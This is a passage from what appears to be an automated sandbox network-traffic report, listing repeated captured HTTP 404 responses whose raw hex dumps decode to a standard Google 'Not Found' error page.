70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 